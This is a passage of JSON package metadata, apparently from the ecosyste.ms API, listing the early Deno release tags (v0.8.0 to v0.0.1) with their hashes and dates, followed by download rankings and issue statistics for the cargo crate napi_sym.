parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-25T23:04:12.095Z","dependent_packages_count":5,"downloads":311558,"downloads_period":"total","dependent_repos_count":1,"rankings":{"downloads":10.531512383364234,"dependent_repos_count":16.666163825614724,"dependent_packages_count":6.221528343439829,"stargazers_count":0.0022611133722244834,"forks_count":0.05803524322042841,"docker_downloads_count":6.750482392667631,"average":6.704997216946512},"purl":"pkg:cargo/napi_sym","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/napi_sym","docker_dependents_count":1,"docker_downloads_count":5,"usage_url":"https://repos.ecosyste.ms/usage/cargo/napi_sym","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/napi_sym/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-25T19:48:12.804Z","issues_count":6610,"pull_requests_count":9623,"avg_time_to_close_issue":17236144.535497494,"avg_time_to_close_pull_request":1534358.7653889374,"issues_closed_count":3787,"pull_requests_closed_count":8008,"pull_request_authors_count":577,"issue_authors_count":2467,"avg_comments_per_issue":2.509531013615734,"avg_comments_per_pull_request":0.7160968512937753,"merged_pull_requests_count":6992,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":664,"past_year_pull_requests_count":1191,"past_year_avg_time_to_close_issue":1367826.3136363637,"past_year_avg_time_to_close_pull_request":1331942.9891472869,"past_year_issues_closed_count":220,"past_year_pull_requests_closed_count":645,"past_year_pull_request_authors_count":182,"past_year_issue_authors_count":368,"past_year_avg_comments_per_issue":1.216867469879518,"past_year_avg_comments_per_pull_request":1.0839630562552478,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":474,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1789,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/Gi